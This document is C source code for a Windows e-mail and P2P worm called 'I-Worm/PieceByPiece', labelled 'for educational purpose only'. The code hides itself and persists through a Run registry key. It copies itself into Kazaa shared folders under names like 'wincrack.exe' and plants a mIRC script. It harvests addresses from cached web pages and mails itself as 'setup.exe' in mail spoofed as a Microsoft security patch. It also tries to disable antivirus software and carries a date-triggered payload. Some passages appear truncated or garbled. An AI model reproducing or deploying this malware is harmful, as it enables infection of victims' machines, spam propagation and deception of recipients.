/* I-Worm/PieceByPiece Copyright (C) 2002 MI_pirat [Red-Cell] inc. For educational purpose only. Distribute under GPL. Some lyrics from the song that inspired me: "Cause nothing ever lasts forever We're like flowers in this vase, together You and me, it's pulling me down Tearing my down, piece by piece And you can't see That's it's like a disease Killing me now, it's so hard to breathe" -Feeder */ #include #include #include #include #include //--------------------------------------GLOBAL VARIABLES------------------------------------- HWND hwnd; WORD version = MAKEWORD(1,1); WSADATA wsaData; int nRet; char Buf[256],myBuf[256],ch[1],ch2[256],server[]="smtp.barrysworld.com",email[]="john@barrysworld.com",helo[]="barrysworld.com"; char emails[50][100],windir[MAX_PATH],filename[MAX_PATH],winbkup[MAX_PATH],zippth[MAX_PATH]; char cx[1],cx2[33],buc1[8],buc2[8],buc3[8],xxx[256]; SOCKET theSocket; int i,err=0,c=0,connected=0,tim,sending=0; SYSTEMTIME time; double k; DWORD basesize,ProcessId; //--------------------------------------WNDPROC----------------------------------------------- LRESULT CALLBACK WndProc(HWND hWnd,UINT iMsg,WPARAM wParam,LPARAM lParam); //--------------------------------------GETASC------------------------------------------------ int getasc(char chr[1]) { int i=0; char c[1]; for (i=0;i<257;i++) { c[0]=i; if (chr[0]==c[0]) { return(i); } } } //--------------------------------------BASE64----------------------------------------------- void base64(char *file) { //Encodes a file using the "base 64" encoding WIN32_FIND_DATA fis; //It's kinna shitty code, but it works just GREAT! int i,j,n,done=0,k=0,lin=0; double c=0; char tmp[7]; DWORD totsize; char base[64]={'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'}; fstream f(file,ios::in | ios::binary), g("C:\\Msbootlog.sys",ios::out); FindFirstFile(file,&fis); totsize=fis.nFileSizeLow; //Get the file size in bytes for (c=0;c\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); recv(theSocket,Buf,sizeof(Buf),0); if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0') { strcpy(myBuf, "MAIL FROM:<"); strcat(myBuf,email); strcat(myBuf,">\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); recv(theSocket,Buf,sizeof(Buf),0); } if (Buf[0]=='4' || Buf[0]=='5') err=1; if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0' && err==0) { GetSystemTime(&time); srand(time.wSecond); ran=rand(); while (ran>c) { srand(c); ran=ran-rand(); } if (ran<0) ran=ran*(-1); strcpy(myBuf, "RCPT TO:<"); strcat(myBuf, emails[ran]); strcat(myBuf, ">\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); recv(theSocket,Buf,sizeof(Buf),0); } if (Buf[0]=='4' || Buf[0]=='5') err=1; if (Buf[0]=='2' && Buf[1]=='5' && err==0) { strcpy(myBuf, "DATA\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); recv(theSocket,Buf,sizeof(Buf),0); } if (Buf[0]=='4' || Buf[0]=='5') err=1; if (Buf[0]=='3' && Buf[1]=='5' && Buf[2]=='4' && err==0) { if (stricmp(email,"john@barrysworld.com")==0) { //if we use the hard-coded e-mail address strcpy(myBuf, "Reply-To: \"Microsoft\" \x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "From: \"Microsoft\" \x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "Subject: Internet Explorer vulnerability patch\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); } else { //if we find a new address strcpy(myBuf, "From: <"); strcat(myBuf, email); strcat(myBuf, ">\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "Subject: Hello\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); } strcpy(myBuf, "MIME-Version: 1.0\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "Content-Type: multipart/mixed;\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, " boundary = \"bla\"\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "X-Priority: 3\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "X -MSMail - Priority: Normal\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "X-Mailer: mailer@localhost\x0d\x0a\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "This is a multi-part message in MIME format.\x0d\x0a\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "--bla\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "Content-Type: text/plain; charset:us-ascii\x0d\x0a\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "You will find all you need in the attachment.\x0d\x0a\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "--bla\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "Content-Type: application/x-msdownload;\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, " name = \"setup.exe\"\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "Content-Transfer-Encoding: base64\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, "Content-Disposition: attachment;\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); strcpy(myBuf, " filename = \"setup.exe\"\x0d\x0a\x0d\x0a"); send(theSocket,myBuf,strlen(myBuf),0); //Send the file byte by byte fstream f("C:\\Msbootlog.sys",ios::in); for (k=0;k44 && smtp[0]<123) { //if a valid serv. is found, replace the hard-coded one with i=0; //the new one while (smtp[i]!=0) { server[i]=smtp[i]; //Now this is the SMTP server i++; } server[i]=0; //Get the e-mail RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey); RegQueryValueEx(hKey,"SMTP Email Address",0,NULL,eml,&emllen); RegCloseKey(hKey); if (eml[0]>44 && eml[0]<123) { //if a valid e-mail is found, replace the hard-coded one with i=0; //the new one while (eml[i]!=0) { email[i]=eml[i]; //Now this is the "FROM:" e-mail i++; } email[i]=0; } //Set a new "HELO" domain i=strlen(email)-1; j=0; while (email[i]!='@') { helo[j]=email[i]; j++; i--; } } helo[j]=0; strrev(helo); //end } //--------------------------------------FINDMAIL---------------------------------------------- void findmail(char file[MAX_PATH]) //Gets e-mail addresses from HTML files { int ik,j=0; char lin[256],*start,ch[1]; fstream f(file,ios::in); while (f.get(lin,256)) { start=strstr(lin,"mailto:"); if (start!=0) { j=0; c++; ik=start-lin+7; ch[1]=lin[ik]; while (ch[1]!=34 && ch[1]!=58 && ch[1]!=32 && ch[1]!=62 && ch[1]!=63) { emails[c][j]=ch[1]; j++; ik++; ch[1]=lin[ik]; } emails[c][j]=0; } f.get(); } f.close(); } //--------------------------------------FINDFILES--------------------------------------------- void findfiles() { //Searches for .htm files in the temp. directories WIN32_FIND_DATA f; HANDLE hf; int k=0; char pth1[MAX_PATH],pth2[MAX_PATH],pth3[MAX_PATH],pth[MAX_PATH],path[MAX_PATH]; strcpy(pth2,windir); strcat(pth2,"\\Temporary Internet Files\\*"); hf=FindFirstFile(pth2,&f); if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;} while (FindNextFile(hf,&f)!=0 && k<20) { if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;} k++; } FindClose(hf); strcpy(pth2,windir); strcat(pth2,"\\Temporary Internet Files\\"); strcat(pth2,pth1); strcat(pth2,"\\*"); k=0; hf=FindFirstFile(pth2,&f); if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;} while (FindNextFile(hf,&f)!=0 && k<20) { if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;} k++; } FindClose(hf); strcpy(pth2,windir); strcat(pth2,"\\Temporary Internet Files\\"); strcat(pth2,pth1); strcat(pth2,"\\"); strcat(pth2,pth3); strcpy(pth,pth2); strcat(pth,"\\"); strcat(pth2,"\\*.htm"); k=0; hf=FindFirstFile(pth2,&f); while (FindNextFile(hf,&f)!=0 && k<70) { if (f.cFileName[0]!='.') { strcpy(path,pth); strcat(path,f.cFileName); findmail(path); } k++; } FindClose(hf); } //--------------------------------------CONECT------------------------------------------------ int conect() { //Connects to a server using "Winsock" // Start up Winsock i=WSAStartup(version, &wsaData); if (i!=0) {return(0);} // Store information about the server LPHOSTENT lpHostEntry; lpHostEntry = gethostbyname(server); if (lpHostEntry == NULL) { WSACleanup(); connected=0; return(0); } else connected=1; //This means we're connected //Get important data if (err==0) { //If we didn't run this allready and got an error findserver(); findfiles(); } // Create the socket theSocket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (theSocket == INVALID_SOCKET) { WSACleanup(); connected=0; return(0); } SOCKADDR_IN saServer; saServer.sin_family = AF_INET; saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list); saServer.sin_port = htons(25); // Connect to the server nRet = connect(theSocket,(LPSOCKADDR)&saServer,sizeof(struct sockaddr)); if (nRet == SOCKET_ERROR) { WSACleanup(); connected=0; return(0); } nRet = recv(theSocket,Buf,sizeof(Buf),0); if (nRet == SOCKET_ERROR) { WSACleanup(); connected=0; return(0); } if (Buf[0]=='4' || Buf[0]=='5') err=1; if (Buf[0]=='2' && Buf[1]=='2' && Buf[2]=='0') { sendmail(); } //Close the connection closesocket(theSocket); // Shutdown Winsock WSACleanup(); } //--------------------------------------KAZAA----------------------------------------------- void kazaa(char *file) { //Makes a copy in the Kazaa "Shared Folder" int i; char kaza[256],kfile[3][20]; unsigned char kpth[1024]; DWORD kpthlen=sizeof(kpth); HKEY hKey; //The filenames strcpy(kfile[0],"\\mirc6.exe"); strcpy(kfile[1],"\\winamp3.exe"); strcpy(kfile[2],"\\wincrack.exe"); strcpy(kfile[3],"\\icq2002.exe"); //Get the path to Kazaa from the reg. RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Kazaa\\Transfer",0,KEY_QUERY_VALUE,&hKey); RegQueryValueEx(hKey,"DlDir0",0,NULL,kpth,&kpthlen); RegCloseKey(hKey); if (kpth[0]>64 && kpth[0]<123) { i=0; while (kpth[i]!=0) { kaza[i]=kpth[i]; i++; } kaza[i]=0; } GetSystemTime(&time); srand(time.wSecond); if (rand()%5==0) strcat(kaza,kfile[3]); else if (rand()%4==0) strcat(kaza,kfile[2]); else if (rand()%3==0) strcat(kaza,kfile[1]); else if (rand()%2==0) strcat(kaza,kfile[0]); CopyFile(file,kaza,FALSE); } //--------------------------------------INFECTWIN------------------------------------------- void infectwin(char *file) { //Makes copies of the worm in %WinDir%\System\winsys*.exe HKEY hKey; unsigned char val[256]; char rnd[6]; int i=0; strcpy(winbkup,windir); strcat(winbkup,"\\System\\winsys"); GetSystemTime(&time); srand(time.wSecond); itoa(rand(),rnd,10); strcat(winbkup,rnd); strcat(winbkup,".exe"); //Copy file to Windows CopyFile(file,winbkup,TRUE); //Just in case there is no WinZip, use this path strcpy(zippth,winbkup); //Now make Windows run it at startup while (winbkup[i]!=0) { val[i]=winbkup[i]; i++; } val[i]=0; RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey); RegSetValueEx(hKey,"Windows task32 sys",0,REG_SZ,val,sizeof(val)); RegCloseKey(hKey); } //--------------------------------------MIRC-------------------------------------------------- void mirc() { //Creates a mIRC script HKEY hKey; unsigned char mircpth[1024]; char mirc[MAX_PATH]; int i=0; DWORD mircpthlen=sizeof(mircpth); //Get the path from our friend: the registry :) RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\mIRC",0,KEY_QUERY_VALUE,&hKey); RegQueryValueEx(hKey,"UninstallString",0,NULL,mircpth,&mircpthlen); RegCloseKey(hKey); i=1; while (mircpth[i]!=0 && mircpth[i]!='.') { mirc[i-1]=mircpth[i]; i++; } mirc[i-1]=0; i=strlen(mirc); while (mirc[i]!=92) { mirc[i]=0; i--; } strcat(mirc,"script.ini"); //Write a new script.ini fstream f(mirc,ios::out); f<<"[Script]"<","I-Worm/PiecebyPiece",MB_OK+MB_SYSTEMMODAL); } //-------------------------------------------------------------------------------------------- //Main function //-------------------------------------------------------------------------------------------- int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpCmdLine,int nShowCmd){ WNDCLASSEX wndc; MSG msg; HKEY hKey; unsigned char buf[1024],inf[]="yes"; DWORD buflen=sizeof(buf); int first=0; //Create a window wndc.cbClsExtra = 0; wndc.cbSize = sizeof(wndc); wndc.cbWndExtra = 0; wndc.hbrBackground = (HBRUSH)GetStockObject(BLACK_BRUSH); wndc.hCursor = LoadCursor(NULL,IDC_ARROW); wndc.hIcon = LoadIcon(NULL,IDI_APPLICATION); wndc.hIconSm = LoadIcon(NULL,IDI_APPLICATION); wndc.hInstance = hInstance; wndc.lpfnWndProc = WndProc; wndc.lpszClassName = "ClassName"; wndc.lpszMenuName = NULL; wndc.style = CS_HREDRAW|CS_VREDRAW; RegisterClassEx(&wndc); hwnd =CreateWindow("ClassName","NEWWIN",WS_POPUPWINDOW,0,0,1024,1024,NULL,NULL,hInstance,NULL); UpdateWindow(hwnd); //Hide the window ShowWindow(hwnd,SW_HIDE); //Get the filename and disable (if possible) any AVs GetWindowThreadProcessId(hwnd,&ProcessId); processes(); GetWindowsDirectory (windir, sizeof (windir)); //Get the Windir //Check if the comp. was infected before RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\RedCell",0,KEY_QUERY_VALUE,&hKey); RegQueryValueEx(hKey,"infected",0,NULL,buf,&buflen); RegCloseKey(hKey); if (buf[0]!='y' || buf[1]!='e' || buf[2]!='s') { RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\RedCell",&hKey); //Create a key in the registry to mark the PC as infected RegSetValueEx(hKey,"infected",0,REG_SZ,inf,sizeof(inf)); RegCloseKey(hKey); //----INFECT COMPUTER---- infectwin(filename); kazaa(filename); zipit(winbkup); mirc(); base64(filename); conect(); first=1; MessageBox(hwnd,"This program has performed an illegal operation","Error",MB_OK+MB_ICONSTOP); } base64(filename); GetSystemTime(&time); if (time.wDay==15 && time.wMonth==9) payload(); //Activate payload when school starts (15 sept. in Romania) if (first==0) { base64(filename); //Write a "base64" encoded file every time (just in case) conect(); //Try to connect if (err!=0) { //If the server found in the reg. got an error, try using the hard-coded serv. strcpy(server,"smtp.barrysworld.com"); strcpy(email,"john@barrysworld.com"); strcpy(helo,"barrysworld.com"); conect(); } } if (connected==0) SetTimer(hwnd,tim,50000,TimerProc); //Go resident and check for a connection every 50 secs. while(GetMessage(&msg,NULL,0,0)) { //Stuff... ;-) TranslateMessage(&msg); DispatchMessage(&msg); } return msg.wParam; //end of main() } //--------------------------------------WNDPROC---------------------------------------------- LRESULT CALLBACK WndProc(HWND hwnd,UINT iMsg,WPARAM wParam,LPARAM lParam) { HDC hdc; PAINTSTRUCT ps; switch(iMsg){ case WM_PAINT: hdc = BeginPaint(hwnd,&ps); EndPaint(hwnd,&ps); return 0; case WM_DESTROY: PostQuitMessage(0); return 0; } return DefWindowProc(hwnd,iMsg,wParam,lParam); } //That's all folks! e-mail to: MI_pirat@yahoo.com , web: www.virus.isfunny.com || www.red-cell.tk